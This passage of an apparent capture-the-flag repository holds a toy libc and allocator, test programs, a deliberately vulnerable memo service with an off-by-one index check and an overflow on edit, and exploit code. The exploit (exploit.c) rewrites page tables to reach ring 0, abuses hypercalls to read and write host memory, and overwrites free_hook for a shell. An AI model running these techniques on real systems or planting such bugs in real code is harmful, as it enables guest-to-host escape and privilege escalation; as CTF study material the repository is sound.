514 | } 515 | 516 | p = _alloc_top(av, nb); 517 | 518 | //check_chunk(av, p); 519 | return p; 520 | } 521 | 522 | static void _alloc_split(mstate av, mchunkptr p, size_t nb){ 523 | size_t size, remainder_size; 524 | 525 | size = CHUNK_SIZE(p); 526 | assert(size >= nb); 527 | 528 | remainder_size = size - nb; 529 | if(remainder_size < MINSIZE) 530 | SET_INUSE_AT_OFFSET(p, size); 531 | else{ 532 | mchunkptr remainder, fwd, bck; 533 | int inuse; 534 | 535 | inuse = INUSE_AT_OFFSET(p, size); 536 | 537 | remainder = CHUNK_AT_OFFSET(p, nb); 538 | SET_HEAD(p, nb | PREV_INUSE_BIT); 539 | SET_HEAD(remainder, remainder_size | PREV_INUSE_BIT); 540 | SET_FOOT(remainder, remainder_size); 541 | 542 | if(inuse) 543 | _int_free(av, remainder); 544 | else{ 545 | if(!IN_SMALLBIN_RANGE(remainder_size)) 546 | remainder->fd_nextsize = remainder->bk_nextsize = NULL; 547 | 548 | bck = UNSORTED_CHUNKS(av); 549 | fwd = bck->fd; 550 | #ifdef DEBUG 551 | printf("[%s]link : %p\n", __func__, p); 552 | #endif 553 | LINK(remainder, fwd, bck); 554 | } 555 | } 556 | } 557 | 558 | static void *_alloc_top(mstate av, size_t nb){ 559 | mchunkptr victim; 560 | size_t size; 561 | size_t remainder_size; 562 | mchunkptr remainder; 563 | 564 | victim = av->top; 565 | size = CHUNK_SIZE(victim); 566 | 567 | if(size < nb + MINSIZE) 568 | return NULL; 569 | 570 | remainder_size = size - nb; 571 | remainder = CHUNK_AT_OFFSET(victim, nb); 572 | 573 | av->top = remainder; 574 | SET_HEAD(victim, nb | PREV_INUSE_BIT | (av != &main_arena ? 
NON_MAIN_ARENA_BIT : 0)); 575 | SET_HEAD(remainder, remainder_size | PREV_INUSE_BIT); 576 | 577 | return victim; 578 | } 579 | 580 | static void link_bins(mstate av, mchunkptr p){ 581 | mchunkptr fwd, bck; 582 | size_t size; 583 | unsigned idx; 584 | 585 | size = CHUNK_SIZE(p); 586 | if(IN_SMALLBIN_RANGE(size)){ 587 | idx = SMALLBIN_INDEX(size); 588 | bck = BIN_AT(av, idx); 589 | fwd = bck->fd; 590 | } 591 | else{ 592 | idx = LARGEBIN_INDEX(size); 593 | bck = BIN_AT(av, idx); 594 | fwd = bck->fd; 595 | 596 | if(fwd == bck){ 597 | p->fd_nextsize = p->bk_nextsize = p; 598 | goto link; 599 | } 600 | 601 | if(size < CHUNK_SIZE(bck->bk)){ 602 | fwd = bck; 603 | bck = fwd->bk; 604 | 605 | p->fd_nextsize = fwd->fd; 606 | p->bk_nextsize = fwd->fd->bk_nextsize; 607 | p->fd_nextsize->bk_nextsize = p->bk_nextsize->fd_nextsize = p; 608 | 609 | goto link; 610 | } 611 | 612 | while(size < CHUNK_SIZE(fwd)) 613 | fwd = fwd->fd_nextsize; 614 | 615 | if(size == CHUNK_SIZE(fwd)){ 616 | fwd = fwd->fd; 617 | p->fd_nextsize = p->bk_nextsize = NULL; 618 | } 619 | else{ 620 | p->fd_nextsize = fwd; 621 | p->bk_nextsize = fwd->bk_nextsize; 622 | p->fd_nextsize->bk_nextsize = p->bk_nextsize->fd_nextsize = p; 623 | } 624 | bck = fwd->bk; 625 | } 626 | 627 | link: 628 | #ifdef DEBUG 629 | printf("[%s]link : %p\n", __func__, p); 630 | #endif 631 | LINK(p, fwd, bck); 632 | } 633 | 634 | static void unlink_freelist(mchunkptr p){ 635 | mchunkptr fwd, bck; 636 | 637 | assert(CHUNK_SIZE(p) == PREV_SIZE(NEXT_CHUNK(p))); 638 | 639 | fwd = p->fd; 640 | bck = p->bk; 641 | 642 | #ifdef DEBUG 643 | printf("[%s]unlink : %p\n", __func__, p); 644 | #endif 645 | assert(fwd->bk == p && bck->fd == p); 646 | 647 | bck->fd = fwd; 648 | fwd->bk = bck; 649 | 650 | if(!IN_SMALLBIN_RANGE(CHUNK_SIZE_NOMASK(p)) && p->fd_nextsize){ 651 | mchunkptr fwd_ns, bck_ns; 652 | 653 | fwd_ns = p->fd_nextsize; 654 | bck_ns = p->bk_nextsize; 655 | 656 | assert(fwd_ns->bk_nextsize == p && bck_ns->fd_nextsize == p); 657 | 658 | if(fwd->fd_nextsize){ 659 | fwd_ns->bk_nextsize = bck_ns; 660 | bck_ns->fd_nextsize = fwd_ns; 661 | } 662 | else if (p->fd_nextsize == p) 663 | fwd->fd_nextsize = fwd->bk_nextsize = fwd; 664 | else{ 665 | fwd->fd_nextsize = fwd_ns; 666 | fwd->bk_nextsize = bck_ns; 667 | fwd_ns->bk_nextsize = bck_ns->fd_nextsize = fwd; 668 | } 669 | } 670 | } 671 | 672 | static void munmap_chunk(mchunkptr p){ 673 | void *block; 674 | size_t total_size; 675 | 676 | block = (void*)p - PREV_SIZE(p); 677 | total_size = CHUNK_SIZE(p) + PREV_SIZE(p); 678 | 679 | munmap(block, total_size); 680 | } 681 | -------------------------------------------------------------------------------- /bin/libc/malloc/malloc.h: -------------------------------------------------------------------------------- 1 | #ifndef __MALLOC_H 2 | #define __MALLOC_H 3 | 4 | #include 5 | #include 6 | 7 | #define SIZE_SZ (sizeof(size_t)) 8 | 9 | #define NBINS 128 10 | #define NFASTBINS (FASTBIN_INDEX(REQUEST2SIZE(MAX_FAST_SIZE)) + 1) 11 | #define NSMALLBINS 64 12 | 13 | #define MAX_FAST_SIZE (SIZE_SZ * 80 / 4) 14 | #define SMALLBIN_WIDTH MALLOC_ALIGNMENT 15 | #define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ) 16 | #define MIN_LARGE_SIZE ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH) 17 | 18 | #define FASTBIN_INDEX(sz) ((((unsigned int)(sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2) 19 | #define SMALLBIN_INDEX(sz) ((SMALLBIN_WIDTH == 16 ? (((unsigned)(sz)) >> 4) : (((unsigned) (sz)) >> 3)) + SMALLBIN_CORRECTION) 20 | #define LARGEBIN_INDEX(sz) \ 21 | (((((uint64_t) (sz)) >> 6) <= 48) ? 
48 + (((uint64_t) (sz)) >> 6) :\ 22 | ((((uint64_t) (sz)) >> 9) <= 20) ? 91 + (((uint64_t) (sz)) >> 9) :\ 23 | ((((uint64_t) (sz)) >> 12) <= 10) ? 110 + (((uint64_t) (sz)) >> 12) :\ 24 | ((((uint64_t) (sz)) >> 15) <= 4) ? 119 + (((uint64_t) (sz)) >> 15) :\ 25 | ((((uint64_t) (sz)) >> 18) <= 2) ? 124 + (((uint64_t) (sz)) >> 18) : 126) 26 | 27 | #define MALLOC_ALIGNMENT (SIZE_SZ*2 < __alignof__(long double) ? __alignof__(long double) : SIZE_SZ*2) 28 | #define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1) 29 | #define MIN_CHUNK_SIZE (offsetof(struct malloc_chunk, fd_nextsize)) 30 | #define MINSIZE ((uint64_t)((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)) 31 | #define REQUEST2SIZE(req) \ 32 | (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE) ? MINSIZE : ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK) 33 | 34 | struct malloc_chunk { 35 | size_t prev_size; 36 | size_t size; 37 | 38 | struct malloc_chunk *fd, *bk; 39 | struct malloc_chunk *fd_nextsize, *bk_nextsize; 40 | }; 41 | typedef struct malloc_chunk *mchunkptr, *mfastbinptr, *mbinptr; 42 | 43 | struct malloc_state { 44 | char mutex; 45 | int flags; 46 | 47 | mfastbinptr fastbinsY[NFASTBINS]; 48 | 49 | mchunkptr top; 50 | mchunkptr last_reminder; 51 | mbinptr bins[NBINS*2]; 52 | 53 | struct malloc_state *next; 54 | size_t system_mem; 55 | }; 56 | typedef struct malloc_state *mstate; 57 | 58 | struct malloc_par { 59 | size_t mmap_threshold; 60 | }; 61 | 62 | #endif 63 | -------------------------------------------------------------------------------- /bin/libc/misc/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := misc.a 2 | 3 | include ../template.mk 4 | -------------------------------------------------------------------------------- /bin/libc/misc/brk.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "../syscall.h" 4 | 5 | static void *__curbrk; 6 | 7 | int brk(void *addr){ 8 | void *res; 9 | 10 | syscall(res, NR_brk); 11 | 12 | if(res < 0) 13 | return -1; 14 | 15 | __curbrk = (void*)res; 16 | return 0; 17 | } 18 | 19 | void *sbrk(intptr_t increment){ 20 | void *oldbrk; 21 | 22 | if (__curbrk == NULL && brk(0) < 0) 23 | return (void *) -1; 24 | 25 | if (increment == 0) 26 | return __curbrk; 27 | 28 | oldbrk = __curbrk; 29 | if (increment > 0 30 | ? 
((uintptr_t) oldbrk + (uintptr_t) increment < (uintptr_t) oldbrk) 31 | : ((uintptr_t) oldbrk < (uintptr_t) -increment)) 32 | return (void *) -1; 33 | 34 | if (brk(oldbrk + increment) < 0) 35 | return (void *) -1; 36 | 37 | return oldbrk; 38 | } 39 | -------------------------------------------------------------------------------- /bin/libc/misc/mmap.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "../syscall.h" 4 | 5 | void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset){ 6 | void *mem; 7 | 8 | syscall6(mem, NR_mmap, addr, length, prot, flags, fd, offset); 9 | 10 | return mem; 11 | } 12 | 13 | int mprotect(void *addr, size_t len, int prot){ 14 | long res; 15 | 16 | syscall(res, NR_mprotect); 17 | 18 | return res; 19 | } 20 | 21 | int munmap(void *addr, size_t length){ 22 | long res; 23 | 24 | syscall(res, NR_munmap); 25 | 26 | return res; 27 | } 28 | -------------------------------------------------------------------------------- /bin/libc/stdio/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := stdio.a 2 | 3 | include ../template.mk 4 | -------------------------------------------------------------------------------- /bin/libc/stdio/itoa.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | char *itoa(int64_t value, char *str, int radix){ 5 | int i, n; 6 | int64_t _v; 7 | char *p = str; 8 | 9 | if(radix != 10 && radix != 16) 10 | return NULL; 11 | 12 | if(value<0){ 13 | value *= -1; 14 | *(p++) = '-'; 15 | } 16 | 17 | for(n=0, _v=value; _v/=radix; n++); 18 | for(i=n; i>=0; i--, value/=radix) 19 | p[i] = value%radix + (value%radix < 10 ? '0':('a'-10)); 20 | p[n+1] = '\0'; 21 | 22 | return str; 23 | } 24 | 25 | -------------------------------------------------------------------------------- /bin/libc/stdio/printf.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | char *itoa(int64_t value, char *str, int radix); 8 | 9 | char *printf_buf; 10 | 11 | int printf(const char *fmt, ...){ 12 | int n, mod = 0; 13 | va_list ap, ap2; 14 | const char *p; 15 | 16 | if(!printf_buf) 17 | printf_buf = (char*)malloc(0x1000); 18 | 19 | n = strlen(fmt); 20 | 21 | va_start(ap, fmt); 22 | va_copy(ap2, ap); 23 | for(p = fmt; (p = strchr(p, '%')); p += 2){ 24 | register uint64_t arg; 25 | int64_t v; 26 | 27 | arg = va_arg(ap, uint64_t); 28 | switch(*(p+1)){ 29 | case 'p': 30 | n += 2; 31 | case 'd': 32 | case 'x': 33 | v = arg; 34 | if(v < 0){ 35 | n++; 36 | v = -v; 37 | } 38 | for(n++; v /= (*(p+1)=='d'? 10:16); n++); 39 | goto next; 40 | case 's': 41 | n += strlen((char*)arg); 42 | goto next; 43 | } 44 | continue; 45 | next: 46 | n -= 2; 47 | mod++; 48 | } 49 | va_end(ap); 50 | 51 | if(mod > 0){ 52 | char *buf = n+1 < 0x1000 ? printf_buf : malloc(n+1); 53 | 54 | if(!buf){ 55 | n = -1; 56 | goto end; 57 | } 58 | 59 | buf[0] = '\x0'; 60 | while((p = strchr(fmt, '%'))){ 61 | register uint64_t arg; 62 | 63 | strncat(buf, fmt, p-fmt); 64 | 65 | arg = va_arg(ap2, uint64_t); 66 | switch(*(p+1)){ 67 | case 'p': 68 | strncat(buf, "0x", 2); 69 | case 'd': 70 | case 'x': 71 | itoa(arg, buf + strlen(buf), (*(p+1)=='d'? 
10:16)); 72 | break; 73 | case 's': 74 | strncat(buf, (char*)arg, n+1 - strlen(buf)); 75 | break; 76 | default: 77 | strncat(buf, p, 2); 78 | } 79 | fmt = p+2; 80 | } 81 | 82 | strncat(buf, fmt, n+1 - strlen(buf)); 83 | write(1, buf, strlen(buf)); 84 | 85 | if(buf != printf_buf) 86 | free(buf); 87 | } 88 | else 89 | write(1, fmt, n); 90 | 91 | end: 92 | va_end(ap2); 93 | return n; 94 | } 95 | 96 | int sprintf(char *buf, char *fmt, ...){ 97 | va_list ap; 98 | char *p; 99 | 100 | va_start(ap, fmt); 101 | 102 | buf[0] = '\0'; 103 | while((p = strchr(fmt, '%'))){ 104 | register uint64_t arg; 105 | 106 | strncat(buf, fmt, p-fmt); 107 | 108 | arg = va_arg(ap, uint64_t); 109 | switch(*(p+1)){ 110 | case 'p': 111 | strncat(buf, "0x", 2); 112 | case 'd': 113 | case 'x': 114 | itoa(arg, buf + strlen(buf), (*(p+1)=='d'? 10:16)); 115 | break; 116 | case 's': 117 | strcat(buf, (char*)arg); 118 | break; 119 | } 120 | fmt = p+2; 121 | } 122 | strcat(buf, fmt); 123 | 124 | va_end(ap); 125 | 126 | return strlen(buf); 127 | } 128 | -------------------------------------------------------------------------------- /bin/libc/stdlib/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := stdlib.a 2 | 3 | include ../template.mk 4 | -------------------------------------------------------------------------------- /bin/libc/stdlib/abort.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | __attribute__ ((noreturn)) 4 | void abort(void){ 5 | exit(-1); 6 | } 7 | -------------------------------------------------------------------------------- /bin/libc/stdlib/atoi.c: -------------------------------------------------------------------------------- 1 | int atoi(const char *nptr){ 2 | int i, v = 0, sig = 1; 3 | 4 | for(i=0; !(nptr[i]^' '); i++); 5 | if(nptr[i]=='-'){ 6 | sig = -1; 7 | i++; 8 | } 9 | 10 | for(; nptr[i]>='0' && nptr[i]<='9'; i++){ 11 | v *= 10; 12 | v += nptr[i]-'0'; 13 | } 14 | 15 | return v*sig; 16 | } 17 | -------------------------------------------------------------------------------- /bin/libc/stdlib/exit.s: -------------------------------------------------------------------------------- 1 | .intel_syntax 2 | 3 | .global exit 4 | 5 | exit: 6 | mov %rax, 60 7 | syscall 8 | -------------------------------------------------------------------------------- /bin/libc/string/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := string.a 2 | 3 | include ../template.mk 4 | -------------------------------------------------------------------------------- /bin/libc/string/mem.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | void *memset(void *s, int c, size_t n){ 4 | for(int i=0; i 2 | #include 3 | 4 | size_t strlen(const char *s){ 5 | size_t i; 6 | for(i=0; s[i]; i++); 7 | return i; 8 | } 9 | 10 | char *strcat(char *dest, const char *src){ 11 | char *p; 12 | 13 | for(p=dest; *p; p++); 14 | for(; *src; p++, src++) 15 | *p = *src; 16 | *p = '\0'; 17 | 18 | return dest; 19 | } 20 | 21 | char *strncat(char *dest, const char *src, size_t n){ 22 | char *p; 23 | unsigned i; 24 | 25 | for(p=dest; *p; p++); 26 | for(i=0; i 5 | 6 | #define str(s) #s 7 | 8 | #define syscall_woret(nr) asm volatile("mov rax, " str(nr) "\r\nsyscall") 9 | #define syscall(x, nr) asm volatile("mov rax, " str(nr) "\r\nsyscall":"=A"(x)) 10 | #define syscall1(x, nr, arg1) \ 11 | do { asm volatile("mov rdi, %0"::"A"((int64_t)arg1)); syscall(x, 
nr); } while(0) 12 | #define syscall2(x, nr, arg1, arg2) \ 13 | do { asm volatile("mov rsi, %0"::"A"((int64_t)arg2)); syscall1(x, nr, arg1); } while(0) 14 | #define syscall3(x, nr, arg1, arg2, arg3) \ 15 | do { asm volatile("mov rdx, %0"::"A"((int64_t)arg3)); syscall2(x, nr, arg1, arg2); } while(0) 16 | #define syscall4(x, nr, arg1, arg2, arg3, arg4) \ 17 | do { asm volatile("mov r10, %0"::"A"((int64_t)arg4)); syscall3(x, nr, arg1, arg2, arg3); } while(0) 18 | #define syscall5(x, nr, arg1, arg2, arg3, arg4, arg5) \ 19 | do { asm volatile("mov r8, %0"::"A"((int64_t)arg5)); syscall4(x, nr, arg1, arg2, arg3, arg4); } while(0) 20 | #define syscall6(x, nr, arg1, arg2, arg3, arg4, arg5, arg6) \ 21 | do { asm volatile("mov r9, %0"::"A"((int64_t)arg6)); syscall5(x, nr, arg1, arg2, arg3, arg4, arg5); } while(0) 22 | 23 | 24 | #define NR_read 0 25 | #define NR_write 1 26 | 27 | #define NR_mmap 9 28 | #define NR_mprotect 10 29 | #define NR_munmap 11 30 | #define NR_brk 12 31 | 32 | #define NR_exit 60 33 | 34 | #endif 35 | -------------------------------------------------------------------------------- /bin/libc/template.mk: -------------------------------------------------------------------------------- 1 | CSRCS := $(wildcard *.c) 2 | SSRCS := $(wildcard *.s) 3 | 4 | OBJS := $(CSRCS:.c=.o) $(SSRCS:.s=.o) 5 | DEPS := $(CSRCS:.c=.d) 6 | 7 | ifndef CFLAGS 8 | CFLAGS := -Wall -masm=intel -fno-stack-protector -fPIE 9 | endif 10 | 11 | .PHONY: all 12 | all: $(TARGET) 13 | 14 | -include $(DEPS) 15 | 16 | $(TARGET): $(OBJS) 17 | $(AR) rcs $@ $^ 18 | 19 | %.o: %.c 20 | $(CC) $(CFLAGS) -c -MMD -MP $< 21 | 22 | %.o: %.s 23 | $(CC) -c $^ 24 | 25 | .PHONY: clean 26 | clean: 27 | $(RM) $(DEPS) $(OBJS) $(TARGET) 28 | -------------------------------------------------------------------------------- /bin/libc/test/Makefile: -------------------------------------------------------------------------------- 1 | SRCS := $(wildcard *.c) 2 | SHARED_TARGET := $(SRCS:.c=-shared.elf) 3 | STATIC_TARGET := $(SRCS:.c=-static.elf) 4 | 5 | CFLAGS := -Wall -fno-stack-protector -fno-PIE 6 | LDFLAGS := -nostdlib -no-pie 7 | 8 | AS := nasm 9 | 10 | .PHONY: all 11 | all: $(SHARED_TARGET) $(STATIC_TARGET) 12 | 13 | %-shared.elf: %.c start.o ../libc.so 14 | $(CC) $(CFLAGS) $(LDFLAGS) start.o $< -L.. 
-lc -o $@ 15 | execstack -c $@ 16 | 17 | %-static.elf: start.o %.c ../libc.a 18 | $(CC) $(CFLAGS) $(LDFLAGS) $^ -o $@ 19 | execstack -c $@ 20 | 21 | %.o: %.s 22 | $(AS) -f elf64 $^ -o $@ 23 | 24 | .PHONY: clean 25 | clean: 26 | $(RM) $(SHARED_TARGET) $(STATIC_TARGET) 27 | -------------------------------------------------------------------------------- /bin/libc/test/malloc.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | char *global = "Hello!"; 6 | 7 | int main(void){ 8 | char *buf1, *buf2; 9 | 10 | puts(global); 11 | 12 | puts("malloc 0x100"); 13 | buf1 = malloc(0x100); 14 | puts("malloc 0x30000"); 15 | buf2 = malloc(0x30000); 16 | 17 | write(1, "Input strings...", 16); 18 | read(0, buf1, 128); 19 | puts(buf1); 20 | 21 | write(1, "Input strings...", 16); 22 | read(0, buf2, 128); 23 | puts(buf2); 24 | 25 | puts("free 0x100"); 26 | free(buf1); 27 | puts("free 0x30000"); 28 | free(buf2); 29 | 30 | return 0; 31 | } 32 | -------------------------------------------------------------------------------- /bin/libc/test/memory.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int data = 0xdeadbeef; 6 | int bss; 7 | 8 | int main(void){ 9 | int stack; 10 | void *heap, *mmaped[2]; 11 | 12 | heap = malloc(0x10); 13 | mmaped[0] = mmap((void*)0x80000000, 0x1000, 3, 0x22, -1, 0); 14 | mmaped[1] = mmap(NULL, 0x1000, 3, 0x22, -1, 0); 15 | 16 | printf( "text : %p\n" 17 | "data : %p\n" 18 | "bss : %p\n" 19 | "heap : %p\n" 20 | "mmaped 1 : %p\n" 21 | "mmaped 2 : %p\n" 22 | "stack : %p\n" 23 | , main, &data, &bss, heap, mmaped[0], mmaped[1], &stack); 24 | 25 | for(int i=0; i<2; i++) 26 | munmap(mmaped[i], 0x1000); 27 | free(heap); 28 | } 29 | -------------------------------------------------------------------------------- /bin/libc/test/print.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main(void){ 6 | char *buf1, *buf2; 7 | 8 | 9 | buf1 = malloc(128); 10 | buf2 = malloc(128); 11 | printf("buf1 : %p, buf2 : %p\n", buf1, buf2); 12 | 13 | printf("Input string..."); 14 | read(0, buf1, 128); 15 | 16 | sprintf(buf2, "input : %s\natoi : %d\n", buf1, atoi(buf1)); 17 | puts(buf2); 18 | 19 | free(buf1); 20 | free(buf2); 21 | 22 | return 0; 23 | } 24 | -------------------------------------------------------------------------------- /bin/libc/test/rw.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main(void){ 6 | char buf[128]; 7 | 8 | read(0, buf, 128); 9 | puts(buf); 10 | 11 | return 0; 12 | } 13 | -------------------------------------------------------------------------------- /bin/libc/test/start.s: -------------------------------------------------------------------------------- 1 | global _start 2 | extern main, exit 3 | 4 | _start: 5 | call main 6 | mov rdi, rax 7 | call exit 8 | hlt: 9 | hlt 10 | jmp hlt 11 | -------------------------------------------------------------------------------- /bin/memo.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #define BUF_SIZE 128 8 | #define MEMO_SIZE 0x28 9 | #define MEMOS 0x10 10 | 11 | struct memo { 12 | char *data; 13 | int edited; 14 | } *memo; 15 | 16 | int menu(void); 17 | void alloc(void); 18 | void edit(void); 19 | void 
delete(void); 20 | int select_id(void); 21 | 22 | int getnline(char *buf, int len); 23 | int getint(void); 24 | 25 | int main(void){ 26 | puts("==== secret memo service ===="); 27 | 28 | memo = mmap(0, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0); 29 | for(;;){ 30 | switch(menu()){ 31 | case 1: 32 | alloc(); 33 | break; 34 | case 2: 35 | edit(); 36 | break; 37 | case 3: 38 | delete(); 39 | break; 40 | case 0: 41 | goto end; 42 | default: 43 | puts("Wrong input."); 44 | } 45 | } 46 | 47 | end: 48 | munmap(memo, 0x1000); 49 | puts("Bye!"); 50 | 51 | return 0; 52 | } 53 | 54 | int menu(void){ 55 | printf( "\nMENU\n" 56 | "1. Alloc\n" 57 | "2. Edit\n" 58 | "3. Delete\n" 59 | "0. Exit\n" 60 | "> "); 61 | 62 | return getint(); 63 | } 64 | 65 | void alloc(void){ 66 | int id, n; 67 | 68 | for(id = 0; id < MEMOS; id++) 69 | if(!memo[id].data) 70 | break; 71 | 72 | if(id >= MEMOS){ 73 | puts("Entry is FULL..."); 74 | return; 75 | } 76 | 77 | memo[id].data = (char*)calloc(MEMO_SIZE, 1); 78 | memo[id].edited = 0; 79 | 80 | printf("Input memo > "); 81 | n = read(0, memo[id].data, MEMO_SIZE); 82 | 83 | printf("Added id:%d entry (%d bytes)\n", id, n); 84 | } 85 | 86 | void edit(void){ 87 | int id, n; 88 | 89 | if((id = select_id()) < 0) 90 | return; 91 | 92 | if(memo[id].edited){ 93 | puts("You already edited this entry..."); 94 | return; 95 | } 96 | 97 | printf("Input memo > "); 98 | n = read(0, memo[id].data, strlen(memo[id].data)); 99 | memo[id].edited = 1; 100 | 101 | printf("Edited id:%d entry (%d bytes)\n", id, n); 102 | } 103 | 104 | void delete(void){ 105 | int id; 106 | if((id = select_id()) < 0) 107 | return; 108 | 109 | free(memo[id].data); 110 | memo[id].data = NULL; 111 | 112 | printf("Deleted id:%d entry\n", id); 113 | } 114 | 115 | int select_id(void){ 116 | int id; 117 | 118 | printf("Input id > "); 119 | id = getint(); 120 | 121 | if(id < 0 || id > MEMOS){ 122 | puts("Invalid id..."); 123 | return -1; 124 | } 125 | 126 | if(!memo[id].data){ 127 | puts("Entry does not exist..."); 128 | return -1; 129 | } 130 | 131 | return id; 132 | } 133 | 134 | int getnline(char *buf, int size){ 135 | int len; 136 | char *lf; 137 | 138 | if(size < 0) 139 | return 0; 140 | 141 | len = read(0, buf, size-1); 142 | buf[len] = '\0'; 143 | 144 | if((lf=strchr(buf,'\n'))) 145 | *lf='\0'; 146 | 147 | return len; 148 | } 149 | 150 | int getint(void){ 151 | char buf[BUF_SIZE]; 152 | 153 | getnline(buf, sizeof(buf)); 154 | return atoi(buf); 155 | } 156 | -------------------------------------------------------------------------------- /bin/start.s: -------------------------------------------------------------------------------- 1 | global _start 2 | extern main, exit 3 | 4 | _start: 5 | call main 6 | mov rdi, rax 7 | call exit 8 | hlt: 9 | hlt 10 | jmp hlt 11 | -------------------------------------------------------------------------------- /exploit/Makefile: -------------------------------------------------------------------------------- 1 | AS := nasm 2 | 3 | SRCS := $(wildcard *.c) 4 | TARGET := $(SRCS:.c=.elf) 5 | 6 | SUB_OBJS := utils/utils.a 7 | 8 | CFLAGS := -Wall -masm=intel -fno-stack-protector -fPIE 9 | LDFLAGS := -nostdlib -no-pie 10 | 11 | ifndef SYS_HANDLER 12 | SYS_HANDLER := 0x17cb 13 | endif 14 | 15 | export CFLAGS 16 | 17 | .PHONY: all 18 | all: $(TARGET) 19 | 20 | %.elf: start.o %.c $(SUB_OBJS) 21 | $(CC) $(CFLAGS) $(LDFLAGS) $^ -o $@ -DOFST_SYS_HANDLER=$(SYS_HANDLER) 22 | strip $@ 23 | 24 | %.o: %.s 25 | $(AS) -f elf64 $^ 26 | 27 | $(SUB_OBJS): FORCE 28 | $(MAKE) -C $(dir $@) 
$(notdir $@) 29 | 30 | .PHONY: clean 31 | clean: 32 | dirname $(SUB_OBJS) | xargs -l $(MAKE) clean -C 33 | $(RM) $(TARGET) 34 | 35 | FORCE: 36 | -------------------------------------------------------------------------------- /exploit/exploit.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include "utils/hypercall.h" 7 | #include "utils/syscall.h" 8 | 9 | #define PDE64_PRESENT 1 10 | #define PDE64_RW (1U << 1) 11 | #define PDE64_USER (1U << 2) 12 | #define PDE64_PS (1U << 7) 13 | 14 | void get_flag1(void); 15 | void get_flag2(void); 16 | void get_shell(void); 17 | void switch_ring0(void); 18 | void syscall_handler(void); 19 | 20 | int main(void){ 21 | get_flag1(); 22 | switch_ring0(); 23 | 24 | return 0; 25 | } 26 | 27 | void get_flag1(void){ 28 | char *flag; 29 | 30 | puts("Try to call sys_getflag"); 31 | 32 | syscall(flag, NR_getflag); 33 | if((long)flag < 0){ 34 | puts("failed to get flag."); 35 | return; 36 | } 37 | 38 | mprotect(flag, 0x1000, PROT_READ); 39 | puts(flag); 40 | munmap(flag, 0x1000); 41 | } 42 | 43 | void switch_ring0(void){ 44 | void *addr; 45 | uint64_t *pd, *pt; 46 | 47 | puts("Try to switch ring0"); 48 | 49 | addr = mmap((void*)0x80000000, 0x3000, PROT_READ|PROT_WRITE, 0, -1, 0); 50 | munmap(addr, 0x1000); 51 | mmap((void*)0xc0000000, 0x1000, PROT_READ|PROT_WRITE, 0, -1, 0); 52 | 53 | pd = addr + 0x1000; 54 | pt = addr + 0x2000; 55 | 56 | for(int i = 0; i<2; i++) // pd[0] 57 | pt[i] = PDE64_PRESENT | PDE64_RW | PDE64_USER | (0x1000*i); 58 | for(int i = 0; i<3; i++) 59 | pd[8+i] = PDE64_PRESENT | PDE64_RW | PDE64_PS | (0x400000 + 0x200000*i); 60 | 61 | memcpy((void*)(0xc0000000 + OFST_SYS_HANDLER), &syscall_handler, 0x800); 62 | 63 | asm("syscall"); 64 | } 65 | 66 | void syscall_handler(void){ 67 | get_flag2(); 68 | get_shell(); 69 | 70 | asm("hlt"); 71 | } 72 | 73 | void get_flag2(void){ 74 | char *flag; 75 | 76 | flag = hc_load_module(2, 0, 0, 0x1000); 77 | hc_write(flag + 0x8040000000, 0x50, 0); 78 | hc_free(flag); 79 | } 80 | 81 | void get_shell(void){ 82 | void *libc = (void*)0xc1000000; 83 | char *heap = (void*)0xc2000000; 84 | uint64_t *pd = (uint64_t*)(0x8040000000 + 0x2e000); // 85 | 86 | void *main_arena; 87 | uint64_t *free_hook; 88 | hc_read(&main_arena, 0x8, 0); 89 | hc_read(&free_hook, 0x8, 0); 90 | main_arena = libc + (uint64_t)main_arena; 91 | free_hook = libc + (uint64_t)free_hook; 92 | 93 | uint64_t offset_top; 94 | hc_read(&offset_top, 0x8, 0); 95 | hc_write(main_arena + offset_top, 0x18, 0); 96 | 97 | hc_read(free_hook, 0x8, 0); 98 | hc_read(&pd[16], 0x8, 0); 99 | 100 | uint64_t page_offset; 101 | hc_read(&page_offset, 0x8, 0); 102 | 103 | void *p[2]; 104 | p[0] = hc_malloc(0, 0x1000); 105 | p[1] = hc_malloc(0, 0x1000); 106 | 107 | hc_free(p[0]); 108 | hc_read(heap+page_offset, 0x8, 0); 109 | hc_free(p[1]); 110 | } 111 | -------------------------------------------------------------------------------- /exploit/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from sc_expwn import * # https://raw.githubusercontent.com/shift-crops/sc_expwn/master/sc_expwn.py 3 | from os import chdir, path 4 | 5 | bin_file = './kvm.elf' 6 | args = 'kernel.bin memo-static.elf flag2.txt'.split()+['a']*0x100 7 | context(os = 'linux', arch = 'amd64') 8 | # context.log_level = 'debug' 9 | 10 | #========== 11 | 12 | env = Environment('debug', 'local', 'remote') 13 | env.set_item('mode', debug = 
